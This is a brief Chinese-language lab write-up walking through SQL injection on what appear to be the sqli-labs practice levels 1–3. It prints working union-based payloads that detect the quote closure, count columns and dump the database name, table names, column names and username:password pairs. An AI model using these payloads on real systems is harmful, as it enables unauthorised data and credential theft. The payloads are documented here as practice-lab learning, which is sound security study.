这里是本白简单记录的注入步骤:
link.
第一关
1、先判断闭合符号,单引号报错,在后面机上注释符号–+试一下。
?id=1'
?id=1'--+
整挺好。
2、判断一下是注入类型。
?id=1 and 1=1
?id=1 and 1=2
看页面回显位的反馈,如果一致,则是字符注入。
否则就是数字注入。
都显示正确,即为字符注入。
3、 判断列数
?id=1' order by n --+
这里从1到3试了一下都正确,但大于3后就超出该数据库列的个数。
4、爆数据库
?id=0' union select 1,database(),3--+
5、爆数据表
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
6、爆字段
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
7、爆值
?id=0' union select 1,group_concat(username,0x3a,password),3 from users --+
第二关
老规矩,还是先判断闭合符号。
所以再来看一下类型。
可知,这是整型。所以就不用了再添加闭合符号了。
判断列数。
和第一关同一情况,不再重复。
第三关
说烂了的闭合符号。
先输入?id=1’
这次的闭合符号是")。
字符型注入(不再贴图)。
本白,一穷二白,Bugku场景就先放一放,周末愉快。
进实验室了,开森…